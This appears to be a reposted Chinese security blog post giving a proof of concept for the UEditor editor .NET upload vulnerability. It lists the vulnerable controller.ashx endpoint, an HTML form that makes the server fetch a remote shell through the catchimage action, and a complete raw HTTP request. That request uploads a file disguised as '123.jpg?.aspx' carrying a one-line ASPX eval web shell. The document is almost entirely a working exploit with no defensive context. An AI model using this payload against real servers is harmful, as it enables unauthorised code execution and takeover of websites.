漏洞位置
/scripts/ueditor/net/controller.ashx?action=uploadimage
漏洞POC
本地上传Poc
1
2
3
4
| <form action="http://www.xxxxx.com/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
shell addr: <input type="text" name="source[]" />
<input type="submit" value="Submit" />
</form>
|
HTTP请求
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| POST /scripts/ueditor/net/controller.ashx?action=uploadimage HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------139961334010512
Content-Length: 266
Connection: close
Cookie: acw_tc=76b20f4315759493974777367eaf0c66d856b23bd121ba2ceaed703d7277aa
Upgrade-Insecure-Requests: 1
-----------------------------139961334010512
Content-Disposition: form-data; name="upfile"; filename="123.jpg?.aspx"
Content-Type: image/jpeg
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
-----------------------------139961334010512--
|
扫一扫,加入信安圈。
文章来源: https://www.safeinfo.me/2020/06/29/ueditor%E7%BC%96%E8%BE%91%E5%99%A8-net%E7%89%88%E6%9C%AC%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
如有侵权请联系:admin#unsafe.sh